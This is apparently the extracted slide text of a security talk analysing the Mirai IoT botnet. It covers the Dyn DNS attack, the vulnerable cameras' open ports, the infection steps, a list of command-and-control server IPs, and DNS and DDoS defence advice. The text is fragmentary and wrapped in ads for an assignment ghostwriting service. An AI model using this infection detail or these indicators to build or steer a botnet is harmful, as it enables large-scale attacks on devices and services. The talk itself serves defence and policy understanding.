留学生作业代写 HI3518 CPU

SESSION ID: HTA-W10
Mirai and IoT Botnet Analysis

http://blog.erratasec.com

Copyright By PowCoder代写 加微信 powcoder

@ErrataRob

What this talk will cover?
Brief overview of Mirai
The cameras themselves
Step by step from infection to attacks
The Dyn attack
How to protect yourself
How tech details fit into government policy debate
Robert botnet
Terabit scale attacks end of 2016 ~600mbps against
~1 terabit against OVH
~1.2 terabit against DYn
Infects cameras Most cameras
Also printers, routers
Hundreds of thousands of devices
Robert the botnet resides

https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html

CnC servers
192.227.222.73 192.227.222.74 192.227.222.75 192.227.222.76 188.166.65.12 188.166.189.189 185.25.51.115 185.144.29.7 118.89.41.125 93.158.216.170 54.187.144.227 52.163.49.59 46.166.185.34 46.183.223.229 45.119.127.190 35.162.249.35 5.249.154.190

Ordering camera

from at CNN

Packaging from Shenzhen

What do the cameras look like?

HiSilicon HI3518 CPU

Which ports are listening

What does the camera look like?
23: Telnet
9527: some weird shell with no auth 8899: some other web interface

0f539bd5d3ab8a

0f539bd5d3ab8a

0f539bd5d3ab8a

0f539bd5d3ab8a

Camera/Phone firewalled
54.163.237.146 ec2-54-163-237-146.compute-1.amazonaws.com

Configure firewall
Use RaspberryPi-class device as NAT/firewall to create an isolated subnet

http://blog.erratasec.com/2016/10/configuring-raspberry-pi-as-router.html

98 seconds to infection!

Infection process

The ECHI trick
Generates error message
It’s how the bot recognizes that the output is done
Different devices have different command-prompts, so it’s harder parsing output for a command prompt

What is busybox?
Most common shell on IoT devices

Find out CPU:
x86, ARM, MIPS, PowerPC

Download bot

Download bot

Now run the bot

Kills Telnet
/bin/busybox telnetd –p 2323

Kills rival bots

Connect to command/control

List of possible attacks

Attack on Google Project Shield
130 million SYN per second
450 million HTTP queries per second From 175,000 IP addresses
4 million ACK flood GRE floods
UDP floods
https://arstechnica.com/security/2017/02/how-google-fought-back-against-a- crippling-iot-powered-botnet-and-won/

Classic “hit the root name servers” …except one layer down
Port 53 UDP flood ~600gpbs to ~1.2tbps
Amplified by failed DNS lookups No cached failed response

Dyn uses ‘anycast’

http://dyn.com/dns/network-map/

Atlanta -> North Virginia

Add own second DNS

Add Amazon DNS

All eggs in one basket

BGP changes

https://stat.ripe.net/widget/bgplay#w.resource=208.78.70.16

Increase TTLs

Resolver caching
Resolvers cache responses
Drops records after TTL seconds And get a new one
Change: if you can’t get a new one, don’t drop record

Everybody’s doing it
No persistence in botnet
Many fight to take control of the devices
Many splintered botnets rather than one large botnet

Conclusion
The same attack won’t work again

https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/

Complicated
Paras Jha, 20 year old student
Minecraft server maintainer, then anti-DDoS company Way to drive customers from other anti-DDoS companies Complicated interactions with the underground

Source code
Amateurish, like that of 20 year old students
Doesn’t mean “stupid”, just not features of professional coders. Multiple coders https://github.com/jgamblin/Mirai-Source-Code

Apply: How to protect yourself?
You probably don’t have cameras
Vuln scanning for it on your network is probably pointless
You need a DNS strategy You need a DDoS strategy You need a UPnP strategy

DNS server strategy
Use redundant servers
One should be a server than can handle DDoS Set longer TTLs

DNS client strategy
Setup your own resolver
Disable discarding stale records after TTL if no response
Make sure services can keep running if DNS fails The DNS supply chain

Apply: Policy question
For government policy makers crafting laws/regulations What can government do to ward off IoT botnets.

It’s a complicated answer
Only 10.9% are in the United States
Unbranded grey market, where they ignore regulation anyway
IoT is behind firewall, cameras are exposed. This was not an IoT botnet
Cameras need remote reset (aka. Backdoor) Dyn fixed itself, without government help

An IoT threat model, part 1
No user interaction
Clicking on links/emails is how you infect your desktop/laptop But not iPhones, mostly
No exposed ports
At least, as the norm
So no direct vulnerable services, OWASP, etc.

An IoT threat model, part 2
Cross Site Request Forgery Clicking on links/emails
Cloud service
Phishing of username/password
Cloud provider gets owned
— IoT autoupdate considered harmful
Local WiFi
UPnP etc. for inbound

An IoT threat model, part 3
Vendors demand inbound connection Old IoT like medical devices, HVAC, etc.
IoT on non-private networks Hospitals, bars, universities, etc.
IPv4 vs IPv6
IPv4 for IoT increasingly costly, moving to IPv6

Details on how Mirai works Means knowing how cameras work
How to protect yourself from Mirai No Mirai itself, but the attacks it does Fix your DNS
What is the future? What’s the threat model? How can regulations help?

程序代写 CS代考 加微信: powcoder QQ: 1823890830 Email: powcoder@163.com